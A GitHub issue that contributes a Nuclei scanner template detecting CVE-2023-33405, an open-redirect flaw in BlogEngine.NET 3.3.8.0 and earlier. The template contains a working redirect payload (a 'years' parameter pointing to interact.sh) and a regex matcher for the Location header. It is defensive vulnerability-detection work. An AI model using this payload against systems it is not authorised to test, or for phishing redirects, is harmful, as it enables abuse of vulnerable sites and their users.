Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-33405.yaml #8297

Closed
5hank4r opened this issue Oct 1, 2023 · 0 comments · Fixed by #8290
Closed

CVE-2023-33405.yaml #8297

5hank4r opened this issue Oct 1, 2023 · 0 comments · Fixed by #8290
Assignees
Labels
Done Ready to merge template-contribution Nuclei template contribution

Comments

@5hank4r
Copy link
Contributor

5hank4r commented Oct 1, 2023

Template Information:

Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect.

Nuclei Template:


id: CVE-2023-33405

info:
  name: BlogEngine CMS - Open Redirect
  author: Shankar Acharya
  severity: medium
  description: |
    Blogengine.net 3.3.8.0 and earlier is vulnerable to Open Redirect
  reference:
    - https://github.com/hacip/CVE-2023-33405
    - https://nvd.nist.gov/vuln/detail/CVE-2023-33405
  remediation: |
    Update to the latest version of blogengine.net CMS  to fix the open redirect vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/Au:N/C:N/I:P/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-33405
    cwe-id: CWE-601
  metadata:
    max-request: 1
    product: blogengine_cms
    vendor: blogengine
    verified: true
  tags: cve,cve2023,Blogengine,cms,redirect

http:
  - method: GET
    path:
      - "{{BaseURL}}/default.aspx?years=http://interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
          

Reference

https://www.opencve.io/cve/CVE-2023-33405
https://cve.report/CVE-2023-33405

@5hank4r 5hank4r added the template-contribution Nuclei template contribution label Oct 1, 2023
@DhiyaneshGeek DhiyaneshGeek linked a pull request Oct 3, 2023 that will close this issue
2 tasks
@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Oct 3, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Done Ready to merge template-contribution Nuclei template contribution
Projects
None yet
Development

Successfully merging a pull request may close this issue.

3 participants